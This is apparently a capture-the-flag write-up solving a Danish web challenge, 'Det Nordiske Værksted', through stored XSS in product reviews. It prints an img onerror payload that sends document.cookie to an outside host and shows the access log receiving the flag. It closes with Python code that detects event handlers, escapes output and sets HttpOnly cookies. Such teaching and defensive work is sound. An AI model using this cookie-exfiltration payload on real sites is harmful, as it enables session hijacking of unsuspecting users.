Challenge Description

Danish (original)

Velkommen til Det Nordiske Værksted

Frej har endelig fundet sin hjerteven, i hans helt egen webshop.

Det Nordiske Værksted er stedet, hvor kunder ikke bare køber julepynt, men også går på opdagelse i en verden af nordisk inspiration. Mange besøgende elsker at tage sig tid til at kigge rundt på siden, nyde udvalget og lade sig opsluge af stemningen.

Men er den helt sikker?

English (from ChatGPT)

Welcome to The Nordic Workshop

Frej has finally found his heart’s companion, in his very own webshop.

The Nordic Workshop is the place where customers not only buy Christmas decorations but also explore a world of Nordic inspiration. Many visitors love to take their time browsing the site, enjoying the selection, and immersing themselves in the atmosphere.

But is it completely secure?

Solution

Going to the provided website (http://nordiskevaerksted.jul.fdca.dk:5000/), we are met with a webshop:

More interesting, though, are the reviews (anmeldelser), since we can actually write something here that is reflected to other users:

After some trial and error I found out that we can get XSS through the onerror handler of an img tag (script tags don't work):

<img src=x onerror=alert(1);>

So let's try to steal a user's session cookie with the following payload¹:

<img src=x onerror=document.location="https://osiriz.xyz/?c="+document.cookie;>

Looking at the access log, we soon see the flag come in via the cookie exfil:

135.225.104.218 - "GET /?c=Flag=FDCA{N0gle_g4ng3_sk41_m4n_v3nt3}&%20visitor_id=c47192e3-4df9-4251-a4d1-b6282f4cb5b5 HTTP/2.0" 200
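As an added example (not part of the original writeup or the challenge's code), the following Python shows the three controls that would have stopped this chain: a submit-time check that flags inline event handlers such as the onerror used above, HTML-escaping on render so a stored review is displayed as text rather than markup, and an HttpOnly session cookie so document.cookie cannot read it. The sample reviews are the two payloads from this writeup plus a constructed benign one; the cookie name "session" is an assumption, since the challenge never revealed the real one.

```python
import html
from html.parser import HTMLParser


class EventHandlerFinder(HTMLParser):
    """Collects start tags that carry inline event-handler attributes (on*)."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            # html.parser lowercases attribute names, so 'onError' is caught too
            if name.startswith("on"):
                self.hits.append((tag, name, value))


def flags_event_handler(review_text):
    """True if a submitted review contains an inline event handler.

    Run at submit time to reject or quarantine the review before it is stored,
    which is where the onerror payload in this challenge would have been caught.
    """
    finder = EventHandlerFinder()
    finder.feed(review_text)
    finder.close()
    return bool(finder.hits)


def render_review(review_text):
    """Output-encode a stored review so the browser shows it as text, not markup."""
    return html.escape(review_text, quote=True)


def hardened_set_cookie(session_id, name="session"):
    """Set-Cookie value with HttpOnly, so document.cookie can no longer read the session.

    The cookie name 'session' is an assumption; the challenge did not reveal the real one.
    """
    return f"{name}={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    # Constructed sample reviews: the two payloads from the writeup plus a benign one
    samples = [
        "<img src=x onerror=alert(1);>",
        '<img src=x onerror=document.location="https://osiriz.xyz/?c="+document.cookie;>',
        "Flot julepynt, hurtig levering!",
    ]
    for s in samples:
        print(flags_event_handler(s), render_review(s))
```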

  1. I have used my website in this example, but tools like ngrok and python -m http.server could also be used.